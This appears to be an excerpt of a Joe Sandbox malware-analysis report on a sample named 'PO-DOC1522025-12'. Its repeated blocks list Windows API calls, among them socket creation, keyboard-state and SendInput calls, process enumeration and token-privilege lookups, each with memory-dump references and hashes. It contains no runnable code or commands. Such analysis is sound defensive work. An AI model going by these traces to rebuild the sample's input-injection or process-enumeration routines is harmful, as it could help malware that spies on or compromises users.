                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 1998397398-0
                                                                                    • Opcode ID: cc9243115880dfdb1f1dfa5f37561a4385d5c85fd0bbc20e0a56b3dd1da43799
                                                                                    • Instruction ID: 5a0974e35b6748edc973ba36270812cc5c5de39003b712b53f3b959dff0903d3
                                                                                    • Opcode Fuzzy Hash: cc9243115880dfdb1f1dfa5f37561a4385d5c85fd0bbc20e0a56b3dd1da43799
                                                                                    • Instruction Fuzzy Hash: 1BA114756042109FCB14DF28C485E2AB7E5FF98714F05885DF99A9B3A2DB30EE05CB92
                                                                                    APIs
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,001DFC08,?), ref: 001A05F0
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,001DFC08,?), ref: 001A0608
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,001DCC40,000000FF,?,00000000,00000800,00000000,?,001DFC08,?), ref: 001A062D
                                                                                    • _memcmp.LIBVCRUNTIME ref: 001A064E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 314563124-0
                                                                                    • Opcode ID: 535016accd12219b343f247a4c2aa1e249b1041e0fc17a633ded991cdefe0b29
                                                                                    • Instruction ID: 597e065fed8a34c4878cca2b6e8af00dca11112a40910a25f5937b9328cdaf1b
                                                                                    • Opcode Fuzzy Hash: 535016accd12219b343f247a4c2aa1e249b1041e0fc17a633ded991cdefe0b29
                                                                                    • Instruction Fuzzy Hash: C7811A75A00109EFCB05DF94C988EEEB7B9FF8A315F204558E506EB250DB71AE46CB60
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 80d969e5acbbe3072d136cdab1be6bb555934799ec456128bba353f77374e972
                                                                                    • Instruction ID: c1028a7e8015a5469842e718d5686b00af1b8583a992edaeff6a5b68546b70f8
                                                                                    • Opcode Fuzzy Hash: 80d969e5acbbe3072d136cdab1be6bb555934799ec456128bba353f77374e972
                                                                                    • Instruction Fuzzy Hash: BF413A33A00500BBDB257BB99C45ABE3BADEF61330F144229F819D2191E7748A539F61
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00B8F640,?), ref: 001D62E2
                                                                                    • ScreenToClient.USER32(?,?), ref: 001D6315
                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 001D6382
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: abd356eaccd988d4c34e105561bd75bc3ee036f10033c7fc6fcee41c9977729a
                                                                                    • Instruction ID: b982cb899cb9af679a022a45213fc89b706688e0e672f8a7e86b6014c2347c61
                                                                                    • Opcode Fuzzy Hash: abd356eaccd988d4c34e105561bd75bc3ee036f10033c7fc6fcee41c9977729a
                                                                                    • Instruction Fuzzy Hash: 58512C75A00209AFCF14DF68D8849AE7BB5FF55360F10825AF959973A0D730ED91CB90
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 001C1AFD
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C1B0B
                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 001C1B8A
                                                                                    • WSAGetLastError.WSOCK32 ref: 001C1B94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$socket
                                                                                    • String ID:
                                                                                    • API String ID: 1881357543-0
                                                                                    • Opcode ID: 2d628aac1900364692552d05848229afd27fe0148e6a82e36426ea5c2fda7933
                                                                                    • Instruction ID: 1012104c957695cd8d7190eea263dc0d4315dcddb4132ecce167fcaa02e5e313
                                                                                    • Opcode Fuzzy Hash: 2d628aac1900364692552d05848229afd27fe0148e6a82e36426ea5c2fda7933
                                                                                    • Instruction Fuzzy Hash: B941B234640201AFE720AF24C886F2977E5AB55718F54844CF92A9F7D3D772DD42CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e1052beb42853ecc95dea6d39624b2704f7d998e83a32dffc2011e9515d120e6
                                                                                    • Instruction ID: 7e893bd5fa564953d64bedd7fa7348031a3544199d9f998c30598db354f2ac9b
                                                                                    • Opcode Fuzzy Hash: e1052beb42853ecc95dea6d39624b2704f7d998e83a32dffc2011e9515d120e6
                                                                                    • Instruction Fuzzy Hash: AE411B72A04704BFD7249F38CC81B6A7BF9EB98710F10852EF54BDB282D77199118B80
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001B5783
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 001B57A9
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001B57CE
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001B57FA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: 1db8a3a8f64a913b0ed80aae8d43aad218f486822c97807e2b69e9d1b6948999
                                                                                    • Instruction ID: ac4eea02900b73831ee2386fc33be73f5472c8509567f1100753ada4b29edd1c
                                                                                    • Opcode Fuzzy Hash: 1db8a3a8f64a913b0ed80aae8d43aad218f486822c97807e2b69e9d1b6948999
                                                                                    • Instruction Fuzzy Hash: 6B411D39600611DFCB11DF55D544A5EBBE2EF99320B198888E84AAF372CB35FD40CB91
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00166D71,00000000,00000000,001682D9,?,001682D9,?,00000001,00166D71,8BE85006,00000001,001682D9,001682D9), ref: 0017D910
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0017D999
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0017D9AB
                                                                                    • __freea.LIBCMT ref: 0017D9B4
                                                                                      • Part of subcall function 00173820: RtlAllocateHeap.NTDLL(00000000,?,00211444,?,0015FDF5,?,?,0014A976,00000010,00211440,001413FC,?,001413C6,?,00141129), ref: 00173852
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: 90ec978d2fc0f84f691a45b375e549cad0c8eb1893f52d9b885917cbb9c56784
                                                                                    • Instruction ID: 717fb07c240f8cdacf47b091976436b71b0feff291d4613a4ab5b9803fe272da
                                                                                    • Opcode Fuzzy Hash: 90ec978d2fc0f84f691a45b375e549cad0c8eb1893f52d9b885917cbb9c56784
                                                                                    • Instruction Fuzzy Hash: F231CD72A0021AABDF259F64EC41EAE7BB5EF40314F158268FD08D7250EB35CD50CB90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 001D5352
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D5375
                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001D5382
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001D53A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 3340791633-0
                                                                                    • Opcode ID: 9601c154b3b1dfc2a8fdc9b8e0f832a4f2c82d3f7880e2dd8e31315c02ec4032
                                                                                    • Instruction ID: ae25d632e8096a5f84f41101dc23acbaf8574e5271a1ba6bf53005bc88b44796
                                                                                    • Opcode Fuzzy Hash: 9601c154b3b1dfc2a8fdc9b8e0f832a4f2c82d3f7880e2dd8e31315c02ec4032
                                                                                    • Instruction Fuzzy Hash: 6631A034A56A08FFEB349E14CC46BE97767BB143D0F584103FA11963E1C7B4A990DB82
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 001AABF1
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 001AAC0D
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 001AAC74
                                                                                    • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 001AACC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: b9afa054a639aade496884fe15731407f80baec0c532f73bf15424a2caca7cee
                                                                                    • Instruction ID: 334beef9445980ec1954ea1bdd381796fecca5f3304c883953411ce4c7fc4b8b
                                                                                    • Opcode Fuzzy Hash: b9afa054a639aade496884fe15731407f80baec0c532f73bf15424a2caca7cee
                                                                                    • Instruction Fuzzy Hash: B1313934A007186FFF35CB648C087FA7BA6AF86330F84471AE481962D9C3759981C792
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 001D769A
                                                                                    • GetWindowRect.USER32(?,?), ref: 001D7710
                                                                                    • PtInRect.USER32(?,?,001D8B89), ref: 001D7720
                                                                                    • MessageBeep.USER32(00000000), ref: 001D778C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: ad8e3b1d70c8430a9b236663aa9b8335aefa9cd8de7a28242f2882166640ae8f
                                                                                    • Instruction ID: 1eeaf14b54c4e8e9a833c041d864844497d18a1ee3500814a5edf8f1795d6ff1
                                                                                    • Opcode Fuzzy Hash: ad8e3b1d70c8430a9b236663aa9b8335aefa9cd8de7a28242f2882166640ae8f
                                                                                    • Instruction Fuzzy Hash: C641BF38A09255DFCB01CF58D898EA977F4FF58310F1585AAE5249B3A1E730E941CF90
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 001D16EB
                                                                                      • Part of subcall function 001A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001A3A57
                                                                                      • Part of subcall function 001A3A3D: GetCurrentThreadId.KERNEL32 ref: 001A3A5E
                                                                                      • Part of subcall function 001A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001A25B3), ref: 001A3A65
                                                                                    • GetCaretPos.USER32(?), ref: 001D16FF
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 001D174C
                                                                                    • GetForegroundWindow.USER32 ref: 001D1752
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: 6d4eaf41881ff02ebf0fe100d8779ed266834753e0243123e70b345b834c5b72
                                                                                    • Instruction ID: b149354743e585cfd81a010cac04de2787e8d840bf2c9b14dee90c1b9fcc1647
                                                                                    • Opcode Fuzzy Hash: 6d4eaf41881ff02ebf0fe100d8779ed266834753e0243123e70b345b834c5b72
                                                                                    • Instruction Fuzzy Hash: 93317075D01249AFC700EFA9C881CEEBBF9EF59304B5080AAE415E7211D731DE45CBA0
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 001AD501
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 001AD50F
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 001AD52F
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001AD5DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: a7899d3657aec942e8175e4602153b6165cf35be4c3b65bb8920fcc833bd6763
                                                                                    • Instruction ID: 38396b62cad367146a7ec13e9bd23a5c2b3ec33c5ff696117d39a27fb28a640e
                                                                                    • Opcode Fuzzy Hash: a7899d3657aec942e8175e4602153b6165cf35be4c3b65bb8920fcc833bd6763
                                                                                    • Instruction Fuzzy Hash: CB31A4721083019FD301EF54D885AAFBBF8EFA9354F14092DF586861A2EB719949CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    • GetCursorPos.USER32(?), ref: 001D9001
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00197711,?,?,?,?,?), ref: 001D9016
                                                                                    • GetCursorPos.USER32(?), ref: 001D905E
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00197711,?,?,?), ref: 001D9094
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: c86bf970ccb812d098fa61fa7da794076ab099082cc9bf39025d528e09bc1f53
                                                                                    • Instruction ID: ab969b958e063aed55e7c193c532e46b66267f7c0dc74ea114f5069e8e1d17d8
                                                                                    • Opcode Fuzzy Hash: c86bf970ccb812d098fa61fa7da794076ab099082cc9bf39025d528e09bc1f53
                                                                                    • Instruction Fuzzy Hash: FF21D131601018EFDB259F94EC58EFA3BB9EF49350F048156F9058B261C73599A0DBA0
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(?,001DCB68), ref: 001AD2FB
                                                                                    • GetLastError.KERNEL32 ref: 001AD30A
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 001AD319
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,001DCB68), ref: 001AD376
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2267087916-0
                                                                                    • Opcode ID: a21036e8e5ffa5d1d2c2858a2b593536433f171c3284328963c794731703895d
                                                                                    • Instruction ID: f4f5899e157f8388eedcfe4df49a5bd2898db71773b270453b86327aff61ea3d
                                                                                    • Opcode Fuzzy Hash: a21036e8e5ffa5d1d2c2858a2b593536433f171c3284328963c794731703895d
                                                                                    • Instruction Fuzzy Hash: 352183B45056029F8B10DF28D88146EB7E4FF57364F104A1EF4AAC76A1D731D945CB93
                                                                                    APIs
                                                                                      • Part of subcall function 001A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001A102A
                                                                                      • Part of subcall function 001A1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001A1036
                                                                                      • Part of subcall function 001A1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1045
                                                                                      • Part of subcall function 001A1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001A104C
                                                                                      • Part of subcall function 001A1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001A1062
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001A15BE
                                                                                    • _memcmp.LIBVCRUNTIME ref: 001A15E1
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001A1617
                                                                                    • HeapFree.KERNEL32(00000000), ref: 001A161E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1592001646-0
                                                                                    • Opcode ID: e73d0edc1abb02aff5b3685989606b3e4486fb2f3b6ff4f868146043d3f52666
                                                                                    • Instruction ID: 751d3f6e0f2b61ea8d284d40f47befb184b96ff40c752c06be381aa18f7933f6
                                                                                    • Opcode Fuzzy Hash: e73d0edc1abb02aff5b3685989606b3e4486fb2f3b6ff4f868146043d3f52666
